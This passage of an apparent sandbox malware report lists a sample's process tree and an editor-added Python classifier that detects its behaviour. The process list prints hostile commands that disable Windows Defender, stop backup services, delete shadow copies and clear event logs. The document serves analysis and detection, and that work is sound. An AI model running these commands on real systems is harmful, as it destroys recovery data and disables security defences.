| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1352 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1656 wrote to memory of 1060 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1656 wrote to memory of 1060 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1656 wrote to memory of 1060 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1656 wrote to memory of 1060 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 560 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 560 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 560 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 560 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 560 wrote to memory of 568 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 560 wrote to memory of 568 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 560 wrote to memory of 568 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 560 wrote to memory of 568 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1092 wrote to memory of 888 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1092 wrote to memory of 888 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1092 wrote to memory of 888 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1092 wrote to memory of 888 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1836 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1836 wrote to memory of 1604 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1836 wrote to memory of 1604 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1836 wrote to memory of 1604 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1836 wrote to memory of 1604 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1792 wrote to memory of 432 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1792 wrote to memory of 432 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1792 wrote to memory of 432 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1792 wrote to memory of 432 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 744 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 744 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 744 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 744 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 744 wrote to memory of 1752 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 744 wrote to memory of 1752 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 744 wrote to memory of 1752 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 744 wrote to memory of 1752 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 964 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 964 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 964 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 964 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 964 wrote to memory of 1532 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 964 wrote to memory of 1532 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 964 wrote to memory of 1532 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 964 wrote to memory of 1532 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1352 wrote to memory of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1352 wrote to memory of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe | C:\Windows\SysWOW64\net.exe |
| PID 1928 wrote to memory of 1812 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1928 wrote to memory of 1812 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1928 wrote to memory of 1812 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |
| PID 1928 wrote to memory of 1812 | N/A | C:\Windows\SysWOW64\net.exe | C:\Windows\SysWOW64\net1.exe |

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
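
The process list above is the sample's complete defence-evasion and recovery-inhibition sequence: net stop and sc config against backup-related services, reg.exe against the Windows Defender policy, service and ETW autologger keys, schtasks against Defender's maintenance tasks, vssadmin and wmic against shadow copies, and wevtutil against the event logs. The Python below is an added example by the editor; it is not part of the sandbox report and not the sample's code. It classifies command lines of this kind with a small rule table so that process-creation telemetry (Sysmon Event ID 1, Security Event ID 4688) can be tested against the same behaviours. Labels reuse the report's signature names where one exists; the patterns, the remaining labels and the ATT&CK technique IDs attached to them are the editor's mapping, not the sandbox's. The command lines embedded in SAMPLE_CMDLINES are copied from the Processes section.

```python
"""Classify Windows process command lines into the evasion and recovery-
inhibition behaviours this report flags.

Added example, not part of the sandbox report and not the sample's code.
SAMPLE_CMDLINES are copied from the Processes section above; the rule
table, its labels and the ATT&CK technique IDs are the editor's mapping.
"""
import re
from collections import defaultdict

# (label, ATT&CK technique, pattern).  Labels reuse the report's signature
# names where one exists.  Patterns are searched, not anchored, so a
# "cmd.exe /c ..." wrapper is flagged as well as its child process.
RULES = [
    ("Stops a service with net stop", "T1489",
     re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+", re.I)),
    ("Disables a service with sc config", "T1489",
     re.compile(r"\bsc(?:\.exe)?\s+config\s+.*start=\s*disabled", re.I)),
    ("Deletes shadow copies", "T1490",
     re.compile(r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows"
                r"|wmic(?:\.exe)?\s+shadowcopy\s+delete)", re.I)),
    ("Clears Windows event logs", "T1070.001",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+\S+", re.I)),
    ("Deletes Windows Defender Definitions", "T1562.001",
     re.compile(r'MpCmdRun\.exe"?\s+-RemoveDefinitions', re.I)),
    ("Modifies Windows Defender Real-time Protection settings", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$true", re.I)),
    ("Disables a Windows Defender scheduled task", "T1562.001",
     re.compile(r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"Microsoft\\Windows\\'
                r'(?:Windows Defender|ExploitGuard)\\[^"]*"\s+/Disable', re.I)),
]

# reg.exe is judged on the key path and data, not on the binary name.
REG_RE = re.compile(
    r'\breg(?:\.exe)?\s+(?P<op>add|delete)\s+"(?P<key>[^"]+)"'
    r'(?:\s+/v\s+"(?P<value>[^"]+)")?(?:\s+/t\s+\w+)?(?:\s+/d\s+"(?P<data>[^"]*)")?',
    re.I)
SERVICE_KEY_RE = re.compile(r"^hklm\\system\\currentcontrolset\\services\\(?P<name>[^\\]+)$")
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
DEFENDER_AUTOLOGGER = r"hklm\system\currentcontrolset\control\wmi\autologger\defender"
# Defender / Security Center services and drivers the sample sets to Start=4 (SERVICE_DISABLED).
SECURITY_SERVICES = {"windefend", "wdnissvc", "wdfilter", "wdboot", "wdnisdrv",
                     "securityhealthservice"}


def classify_reg(m):
    """Rules for one reg.exe add/delete match; returns (label, technique) pairs."""
    op, key = m["op"].lower(), m["key"].lower()
    value, data = (m["value"] or "").lower(), m["data"] or ""
    hits = []
    if key.startswith(DEFENDER_POLICY):
        hits.append(("Modifies Windows Defender policy", "T1562.001"))
    svc = SERVICE_KEY_RE.match(key)
    if svc and value == "start" and data == "4":
        if svc["name"] in SECURITY_SERVICES:
            hits.append(("Modifies security service", "T1562.001"))
        else:
            hits.append(("Disables a service via its Start value", "T1489"))
    if key.startswith(DEFENDER_AUTOLOGGER) and value == "start" and data == "0":
        hits.append(("Disables Windows Defender ETW autologger", "T1562.006"))
    if op == "delete" and key.endswith(r"\shellex\contextmenuhandlers\epp"):
        hits.append(("Modifies registry class", "T1112"))
    if op == "delete" and key.endswith(r"\run") and "defender" in value.replace(" ", ""):
        hits.append(("Removes Windows Defender autorun entry", "T1112"))
    return hits


def classify(cmdline):
    """Return every (label, technique) pair that matches one command line."""
    hits = []
    m = REG_RE.search(cmdline)
    if m:
        hits.extend(classify_reg(m))
    hits.extend((label, tid) for label, tid, rx in RULES if rx.search(cmdline))
    return hits


def summarize(cmdlines):
    """Hit count per ATT&CK technique across a whole process list."""
    counts = defaultdict(int)
    for cmdline in cmdlines:
        for _label, tid in classify(cmdline):
            counts[tid] += 1
    return dict(counts)


# Copied from the Processes section of this report (win7 detonation).
SAMPLE_CMDLINES = [
    r'net.exe stop "VSS" /y',
    r'sc.exe config "VSS" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wmic.exe shadowcopy delete',
    r'wevtutil.exe cl security',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
]

if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        print(cmdline, "->", classify(cmdline))
    print(summarize(SAMPLE_CMDLINES))
```

Two of the report's own lines deliberately produce no hit: `wmic.exe SHADOWCOPY /nointeractive` only opens the interactive wmic alias, and `reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f` is flagged on the policy key rather than as a service change. The per-technique count, rather than any single rule, is what separates this burst of activity from an administrator running one of these commands by hand.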

Network

N/A

Files

memory/1656-54-0x0000000000000000-mapping.dmp

memory/1060-55-0x0000000000000000-mapping.dmp

memory/560-56-0x0000000000000000-mapping.dmp

memory/568-57-0x0000000000000000-mapping.dmp

memory/1092-58-0x0000000000000000-mapping.dmp

memory/888-59-0x0000000000000000-mapping.dmp

memory/1836-60-0x0000000000000000-mapping.dmp

memory/1604-61-0x0000000000000000-mapping.dmp

memory/1792-62-0x0000000000000000-mapping.dmp

memory/432-63-0x0000000000000000-mapping.dmp

memory/744-64-0x0000000000000000-mapping.dmp

memory/1752-65-0x0000000000000000-mapping.dmp

memory/964-66-0x0000000000000000-mapping.dmp

memory/1532-67-0x0000000000000000-mapping.dmp

memory/1928-68-0x0000000000000000-mapping.dmp

memory/1812-69-0x0000000000000000-mapping.dmp

memory/1124-70-0x0000000000000000-mapping.dmp

memory/1364-71-0x0000000000000000-mapping.dmp

memory/1944-72-0x0000000000000000-mapping.dmp

memory/1668-73-0x0000000000000000-mapping.dmp

memory/1744-74-0x0000000000000000-mapping.dmp

memory/1932-75-0x0000000000000000-mapping.dmp

memory/1824-76-0x0000000000000000-mapping.dmp

memory/1400-77-0x0000000000000000-mapping.dmp

memory/900-78-0x0000000000000000-mapping.dmp

memory/2028-79-0x0000000000000000-mapping.dmp

memory/1588-80-0x0000000000000000-mapping.dmp

memory/2032-81-0x0000000000000000-mapping.dmp

memory/2036-82-0x0000000000000000-mapping.dmp

memory/1736-83-0x0000000000000000-mapping.dmp

memory/888-84-0x0000000000000000-mapping.dmp

memory/1652-85-0x0000000000000000-mapping.dmp

memory/844-86-0x0000000000000000-mapping.dmp

memory/968-87-0x0000000000000000-mapping.dmp

memory/1136-88-0x0000000000000000-mapping.dmp

memory/976-89-0x0000000000000000-mapping.dmp

memory/1200-90-0x0000000000000000-mapping.dmp

memory/2044-91-0x0000000000000000-mapping.dmp

memory/1680-92-0x0000000000000000-mapping.dmp

memory/1980-93-0x0000000000000000-mapping.dmp

memory/1952-94-0x0000000000000000-mapping.dmp

memory/1628-95-0x0000000000000000-mapping.dmp

memory/860-96-0x0000000000000000-mapping.dmp

memory/1172-97-0x0000000000000000-mapping.dmp

memory/1672-98-0x0000000000000000-mapping.dmp

memory/568-99-0x0000000000000000-mapping.dmp

memory/1408-100-0x0000000000000000-mapping.dmp

memory/624-101-0x0000000000000000-mapping.dmp

memory/740-102-0x0000000000000000-mapping.dmp

memory/1064-103-0x0000000000000000-mapping.dmp

memory/960-104-0x0000000000000000-mapping.dmp

memory/984-105-0x0000000000000000-mapping.dmp

memory/1344-106-0x0000000000000000-mapping.dmp

memory/868-107-0x0000000000000000-mapping.dmp

memory/1000-108-0x0000000000000000-mapping.dmp

memory/1244-109-0x0000000000000000-mapping.dmp

memory/1060-110-0x0000000000000000-mapping.dmp

memory/772-111-0x0000000000000000-mapping.dmp

memory/1284-112-0x0000000000000000-mapping.dmp

memory/1256-113-0x0000000000000000-mapping.dmp

memory/1716-114-0x0000000000000000-mapping.dmp

memory/896-115-0x0000000000000000-mapping.dmp

